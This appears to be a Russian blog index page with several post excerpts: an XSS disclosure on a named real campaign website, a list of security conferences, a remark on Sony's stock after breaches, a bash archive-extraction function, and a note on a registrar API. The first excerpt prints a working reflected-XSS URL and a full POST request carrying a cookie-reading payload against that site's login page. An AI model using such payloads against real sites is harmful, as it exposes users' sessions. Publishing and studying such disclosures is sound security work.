Избранное

Михаил Прохоров mdp2012.ru XSS

Я уважаю этого человека и он мой авторитет, но нельзя же так сайты выпускать.
Надо заботиться о информационной безопасности чуточку.

mdp2012.ru

Server:
nginx/1.0.11
Apache/1.3.42

http://mdp2012.ru/logon.html?back=/admin/%22%3E%%3CBODY%20onload=alert(document.cookie)%3E


POST http://mdp2012.ru:80/logon.html HTTP/1.1
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Cookie: _metrika_enabled=
Host: mdp2012.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/9.80 (X11; Linux i686; U; Debian; pl) Presto/2.9.168 Version/12.51
Accept: */*

action=logon&back=%22><BODY%20onload=alert(document.cookie)>&login=ignkgtnu&mode=common&passwd=acUn3t1x&remember_me=1

Читать дальше

Top 5 мероприятий по ИБ на ближайшее полугодие

  1. IV Межбанковская конференция " УРАЛЬСКИЙ ФОРУМ: ИНФОРМАЦИОННАЯ БЕЗОПАСНОСТЬ БАНКОВ " — 13-18 февраля — Магнитогорск
  2. РусКрипто — 28-31 марта — Москва
  3. Межотраслевой форум директоров по ИБ — 19-20 апреля — Москва
  4. Positive Hack Days — 30-31 мая — Москва
  5. IT & Security Forum — июнь — Казань.




  6. Еще парочка
  7. PCI DSS Russia — пройдет марта в Москве.
  8. IDC IT Security Roadshow в Москве
Читать дальше

Влияет ли информационная безопасность на компании в России?

Как падали цены на акции Sony после взломов?
Вот тут написано: attrition.org/security/rant/sony_aka_sownage.html как падали цены на акции компании Sony.

Прошу заменить,
что в 2011-04-04 цена была 31.45$,
а 2011-12-19(сегодня) — 16,71$ = чистая случайность грубо говоря в 50%?

Кто-то мне сказал, что на репутацию компаний создающих сайты, такие взломы никак не влияют.
Интересно, а будут ли заказывать крупные компании, интернет магазины и финансовые компании — доверять держать персональные данные клиентов на сервере, где не уделяется внимание информационной безопасности и разработке ПО. Конечно сайты визитки клепать и верстку менять — не считается.

Стоит ли доверять разработку продукта — компании которая засветилась в небрежном отношении к прошлым своим продуктам?
Читать дальше

Распаковка всех типов фаилов tar tar.bz2 tar.gz tar.xz bz2 rar gz tar tbz2 tgz zip Z 7z xz exe

Чтобы не вводить каждый раз вручную комманды для распаковки архивов можно использовать приведенную ниже функцию. Добавьте следующий код в ~/.bashrc и используйте extract <file_name>:

extract () {
  if [ -f $1 ] ; then
    case $1 in
      *.tar.bz2)   tar xvjf $1    ;;
      *.tar.gz)    tar xvzf $1    ;;
      *.tar.xz)    tar xvJf $1    ;;
      *.bz2)       bunzip2 $1     ;;
      *.rar)       unrar x $1     ;;
      *.gz)        gunzip $1      ;;
      *.tar)       tar xvf $1     ;;
      *.tbz2)      tar xvjf $1    ;;
      *.tgz)       tar xvzf $1    ;;
      *.zip)       unzip $1       ;;
      *.Z)         uncompress $1  ;;
      *.7z)        7z x $1        ;;
      *.xz)        unxz $1        ;;
      *.exe)       cabextract $1  ;;
      *)           echo "\`$1': неизвестный метод сжатия файла" ;;
    esac
  else
    echo "\`$1' нет такого файла"
  fi
}


Функция сама выберет необходимую программу и аргументы для распаковки конкретного архива.
Читать дальше

cp.mastername.ru API (https шлюз)

cp.mastername.ru API (https шлюз) для регистраци доменов от mastername.ru
Описание API mastername.ru/documents/mastername_partners_gateway.doc
что интересно то этот документ написан 06.2010, а в гугле нету ниодного примера нина одном языке программирования.
Вот решил это исправить. т.к. в поиске яндекса по запросу «cp.mastername.ru api» 40 раз ищют в месяц.

PERL (за этот код спасибо девушке из тех поддержки. С этого примера все и началось, и понял свои ошибки.
Интересно она сама его пишет ))) Yana Besmeltseva vk.com/id826604)
Читать дальше